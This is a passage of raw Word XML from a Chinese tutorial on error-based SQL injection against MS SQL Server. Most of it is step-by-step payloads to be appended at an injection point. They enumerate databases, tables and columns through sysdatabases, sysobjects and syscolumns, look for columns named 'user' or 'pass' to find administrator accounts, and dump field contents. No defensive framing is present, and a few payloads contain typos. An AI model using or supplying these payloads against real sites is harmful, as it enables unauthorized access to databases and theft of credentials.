          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name from testdb.dbo.sysobjects where xtype=0x7500))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096C3FE" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00717ED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递增上面查询语句中的数字n,就可以遍历出指定数据库中的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E9C0AA" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00276D91" w:rsidRDefault="00004116"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3.爆所有字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9107FC" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00223ED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获得表名后，就可以爆表中的字段名了。首先，提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC1A4C" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="00E24D1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 (select top 1 cast (id as nvarchar (20)) %2bchar(124) from [库名</w:t>
      </w:r>
      <w:r w:rsidR="00525098" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..[sysobject</w:t>
      </w:r>
      <w:r w:rsidR="00BC6D01" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] where name='表名 ') =0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9C7F3" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00B5249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以爆出指定表的dbid值，根据表的dbid值才能定位到表中的字段。提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60389628" w14:textId="77777777" w:rsidR="00C836DF" w:rsidRPr="00644363" w:rsidRDefault="00C836DF"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select cast(count(1) as varchar (10)) %2bchar (94) from[库名</w:t>
      </w:r>
      <w:r w:rsidR="004F0F4B" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BC6D01" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="004F0F4B" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[syscolumns] where </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id=dbid 值)=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E57769" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00D645F2"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以爆出得到字段列名数目，然后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22F326" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="00BA402A"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and (select top 1 cast(name as varchar(8000)) from (select top n colid,name from</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> [库名]..[syacolumns] where id=dbid 值 order by colid) t order by colid desc)=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6EA51" w14:textId="77777777" w:rsidR="00BA402A" w:rsidRPr="00764DAB" w:rsidRDefault="00BA402A"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通过递增n的值，就可以得到所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E82CD3" w14:textId="77777777" w:rsidR="00BA402A" w:rsidRPr="00276D91" w:rsidRDefault="00BA402A"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4.快速查询包含管理员账号的表名及字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C56D1" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00BA402A" w:rsidP="001A202D">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对于MsSQL数据库，其中往往有许多数据内容，一个一个地爆字段太麻烦了，通常要快速找到包含管理员账号的表名和字段名，可以查询包含" user”或“pass”之类关键字的表名和字段名。选择关键字后，提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B8AA8" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="00E70FED"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and (select top 1 t</w:t>
      </w:r>
      <w:r w:rsidR="00F44187" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name%2bchar(124)%2bc</w:t>
      </w:r>
      <w:r w:rsidR="00F44187" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">name from (select top 20 object_name(id) as t_name, </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">name as c_name  from syscolumns where charindEx(cast(关键字十六进制 as varchar </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2000)),name)&gt;O and left (name, 1)!=0x40 order by t_name asc) as T order by t</w:t>
      </w:r>
      <w:r w:rsidR="00F44187" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name desc) &gt;0</w:t>
      </w:r>
      <w:r w:rsidR="00F44187" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B33D1B" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00EE170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从返回信息中，即可得到包含关键字的表名和字段名了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BE1D7" w14:textId="77777777" w:rsidR="0091232B" w:rsidRPr="00276D91" w:rsidRDefault="0091232B"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lastRenderedPageBreak/>
        <w:t>5.爆字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53D550" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="0091232B"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首先，要爆出列的总数目，提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B4098" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="0091232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and  (select cast (count (1) as</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> varchar (8000) ) %2bchar(94)from[库名]..[表名]where </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1=1) &gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359DB98" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="0043339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即可从返回信息中查看到字段的记录数目。然后就可以开始爆指定字段的值了，提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949F790" w14:textId="77777777" w:rsidR="00CD36E7" w:rsidRPr="00644363" w:rsidRDefault="00CD36E7"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 xml:space="preserve">and  (select  top  1  isnull </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB22A3" w14:textId="77777777" w:rsidR="00CD36E7" w:rsidRPr="00644363" w:rsidRDefault="00CD36E7"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 xml:space="preserve">(cast([字段1 as nvarchar(4000)),char(32))%2bchar(94)%2bisnull (cast ([字段 2 ] as nvarchar (4000)),char(32))  from </w:t>
      </w:r>
      <w:r w:rsidR="009C09DD" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidR="009C09DD" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> where 1=1 order by [字段1])=O--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C7A17" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00A3591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可得到第一个数据内容，再提交如下语句.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C4AB02" w14:textId="77777777" w:rsidR="003B6EBE" w:rsidRPr="00644363" w:rsidRDefault="003B6EBE"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 (select top 1 isnull(cast([字段1] as nvarchar(4000)),char(32))%2bchar(94)%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE13FB9" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00644363" w:rsidRDefault="003B6EBE"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2bisnull (cast ([字段2] as  nvarchar(4000)),char(32)) from [表名] where 1=1 and name not in (select top n name from [表名]) where 1=1 order by [字段1]))=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56676F" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00DA748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通过递增n的值，就可以得到其他字段记录内容了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAF53F" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="002B4845" w:rsidRDefault="003D5726"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2.8</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F15641" w:rsidRPr="002B4845">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>查询爆库的另一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F6F9D" w14:textId="77777777" w:rsidR="00F15641" w:rsidRPr="00764DAB" w:rsidRDefault="00F15641"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MsSQL的查询语句非常灵活，因此还有下面一种爆出数据库内容的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9D24C" w14:textId="77777777" w:rsidR="00F15641" w:rsidRPr="00276D91" w:rsidRDefault="00F15641"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爆所有数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965759E" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00F15641" w:rsidP="001A202D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"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后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DF73C" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00AC7BA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016317">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F15641" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=(select name from master.dbo.sysdatabases where dbid=</w:t>
      </w:r>
      <w:r w:rsidR="00C761AE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F15641" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E25B31" w14:textId="77777777" w:rsidR="00AC7BA8" w:rsidRPr="00276D91" w:rsidRDefault="00AC7BA8" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41611316" wp14:editId="442605B7">
            <wp:extent cx="5274310" cy="1966574"/>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274310" cy="1966574"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD12897" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00BB66D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增加上面查询语句中的bdid的值，可以获取数据库列表里面的所有数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EEEC4" w14:textId="77777777" w:rsidR="00BB66D8" w:rsidRPr="00276D91" w:rsidRDefault="00BB66D8"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2.爆出当前数据库中的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA9ABE" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00BB66D8"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在注入点后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F0DB7" w14:textId="77777777" w:rsidR="00ED25DB" w:rsidRPr="00764DAB" w:rsidRDefault="00ED25DB"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20and%20(select%20top%201%20name%20from%20(select%20top%20</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%20name%20from%20sysobjects%20where%20xtype=0X75%20order%20by%20name)%20t%20order%20by%20name%20desc)=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE0324" w14:textId="77777777" w:rsidR="00ED25DB" w:rsidRPr="00276D91" w:rsidRDefault="00ED25DB" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B60557" wp14:editId="3EF79580">
            <wp:extent cx="5274310" cy="2062346"/>
            <wp:effectExtent l="19050" t="0" r="254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2062346"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB57DE" w14:textId="77777777" w:rsidR="006A7EFE" w:rsidRPr="00764DAB" w:rsidRDefault="006A7EF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其中0X75是u的十六进制，增加n数字的值，就可以爆出当前数据库的所有表名了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6A6AF" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="006A7EFE"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如果要跨库查询其他数据库的表名，则可提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665428A" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00632D0D"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3A40AA" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">and (select top 1 name from (select top </w:t>
      </w:r>
      <w:r w:rsidR="003A40AA" w:rsidRPr="009C0D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003A40AA" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name from 数据库名..sysobjects where xtype=0X75 order by name) t order by</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidR="003A40AA" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> desc)</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="003A40AA" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6A677" w14:textId="77777777" w:rsidR="00632D0D" w:rsidRPr="00276D91" w:rsidRDefault="00632D0D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2F2080" wp14:editId="19FEA68B">
            <wp:extent cx="5274310" cy="1962150"/>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274310" cy="1962150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1CE04B" w14:textId="77777777" w:rsidR="005A78F6" w:rsidRPr="00764DAB" w:rsidRDefault="00484E2F"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增加n数字的值，就可以爆出指定数据库的所有表名了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD59EDF" w14:textId="77777777" w:rsidR="005A78F6" w:rsidRPr="00276D91" w:rsidRDefault="005A78F6"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3.爆字段名及字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CB425" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="005A78F6"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知道了表名，可以进一步获取数据库表里面的内容了。在注入点处提交如下语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7AED6" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="001C16F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DA5A13" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select col_name(object_id('表名'),n))=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AEE7C" w14:textId="77777777" w:rsidR="001C16F0" w:rsidRPr="00276D91" w:rsidRDefault="001C16F0" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5947E661" wp14:editId="365E06CF">
            <wp:extent cx="5274310" cy="1957835"/>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274310" cy="1957835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BBB00" w14:textId="77777777" w:rsidR="001C16F0" w:rsidRPr="00764DAB" w:rsidRDefault="00DA5A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增加数字n的值，就可以得到表中所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1D26D" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="00DA5A13"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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要获取字段内容可提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2A138" w14:textId="77777777" w:rsidR="00EE1703" w:rsidRPr="00764DAB" w:rsidRDefault="001C16F0" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>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933D73" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select top 1 字段名 from 表名)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DFEAD6" w14:textId="77777777" w:rsidR="001C16F0" w:rsidRPr="00276D91" w:rsidRDefault="001C16F0" w:rsidP="00901209">
      <w:pPr>
